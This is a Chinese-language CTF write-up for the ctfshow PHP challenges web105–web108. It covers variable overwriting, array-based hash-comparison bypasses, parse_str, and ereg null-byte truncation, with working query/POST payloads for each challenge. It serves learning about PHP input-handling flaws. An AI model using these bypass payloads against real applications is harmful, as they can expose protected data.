web105

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 22:34:07

*/

highlight_file(__FILE__);
include('flag.php');
error_reporting(0);
$error='你还想要flag嘛？';
$suces='既然你想要那给你吧！';
foreach($_GET as $key => $value){
    if($key==='error'){
        die("what are you doing?!");
    }
    $$key=$$value;
}foreach($_POST as $key => $value){
    if($value==='flag'){
        die("what are you doing?!");
    }
    $$key=$$value;
}
if(!($_POST['flag']==$flag)){
    die($error);
}
echo "your are good".$flag."\n";
die($suces);

?>

知识点：php变量间接引用（或者叫php变量覆盖）

在代码中，$$key=$$value 是使用变量间接引用（variable variable）的方式来进行赋值操作。

变量间接引用是一种特殊的功能，可以通过变量的值来构建变量名称，并对其赋值。在这里，$key 代表一个变量名，$value 代表变量的值。

当执行 $$key=$$value 时，首先会使用 $value 的值构建一个变量名，并将其赋值给 $key。也就是说，使用变量 $value 的值作为新的变量名，并将这个新的变量名的值指向 $value 的值。

如果觉得太绕了，那就举个例子：

举个例子来说明，假设 $key 的值是 'name'，而 $value 的值是 'John'。那么执行 $$key=$$value 后，就相当于执行 $name=$John。结果就是创建了一个名为 $name 的变量，并将它的值设置为 'John'。

明白了这个那接下来就好办了，直接令suces=flag然后再在POST上传error=flag

原理：

在代码执行时，$$key=$$value 这一行会被执行两次，首先是执行$suces=$flag，然后是执行 $error=$suces。由于$flag 被包含在了flag.php文件中，并被引入到了代码中，因此通过 $suces=$flag，$suces的值即变为了 flag。接着，通过 $error=$suces，$error的值也变为了 flag。

接下来，代码会通过判断if (!($_POST['flag'] == $flag))来检查 $_POST['flag'] 是否等于 $flag，而当我们在POST请求中传递了参数 flag=flag时，这个条件将会满足，所以不会触发 die($error)，而是输出 your are good 和 $flag 的值。

payload：?suces=flag

POST         error=suces

                                                                        web106

<?php

/*
# -*- coding: utf-8 -*-
# @Author: atao
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 22:38:27

*/


highlight_file(__FILE__);
include("flag.php");

if(isset($_POST['v1']) && isset($_GET['v2'])){
    $v1 = $_POST['v1'];
    $v2 = $_GET['v2'];
    if(sha1($v1)==sha1($v2) && $v1!=$v2){
        echo $flag;
    }
}

?>

这里我的一篇文章有相关知识点，这种”比较类“的题目可以花几分钟系统学习

PHP强相等&弱相等（附带科学计数法）_php 科学计数法-CSDN博客

哈希函数主流绕过就一个，拿出数组绕过,只要保证后面的数字不一样就好了

payload：

?v2[]=2

POST   :v1[]=1

                                                                        web107

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 23:24:14

*/


highlight_file(__FILE__);
error_reporting(0);
include("flag.php");

if(isset($_POST['v1'])){
    $v1 = $_POST['v1'];
    $v3 = $_GET['v3'];
       parse_str($v1,$v2);
       if($v2['flag']==md5($v3)){
           echo $flag;
       }

}



?>

知识点：

PHP parse_str（） 函数：将查询字符串解析为变量：

代码重点：

1. 使用 parse_str() 函数将 $v1 作为参数进行解析，并将解析结果赋给变量 $v2。

2. 若 $v2 数组中的 'flag' 键所对应的值等于 $v3 的MD5哈希值，则输出 $flag 的值。

那不还是跟之前的那道题目一嘛,只要v1的值跟v3的值不一样不就好了吗

payload：

?v3[]=0

POST:v1=1

                                                                        web108

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 23:53:55

*/


highlight_file(__FILE__);
error_reporting(0);
include("flag.php");

if (ereg ("^[a-zA-Z]+$", $_GET['c'])===FALSE)  {
    die('error');

}
//只有36d的人才能看到flag
if(intval(strrev($_GET['c']))==0x36d){
    echo $flag;
}

?>
error

呃........这道题目真的难度很大

因为只有36d身材的人才能看到flag（doge），吓得我差点去叫了学姐外援做题，哈哈哈哈哈哈

知识点：

strrev是反转字符串的意思

ereg()函数搜索由指定的字符串作为由模式指定的字符串，如果发现模式则返回true，否则返回false。搜索对于字母字符是区分大小写的。

可选的输入参数regs包含由正则表达式中的括号组成的所有匹配表达式的数组。

在这里的意思就是c必须全是字符

语法

int ereg(string pattern, string originalstring, [array regs]);

返回值

• 如果有找到模式匹配，则返回true，否则返回false。
• 注意php5.3后废弃，看看就好了

前面要全是字符，后面又要877的反转778，怎么可能！

除非进行%00前后截断,截断过后%00后面就不再受到前面的控制，不用全字符。

payload：?c=a%00778

真诚地希望我的文章对大家有所帮助！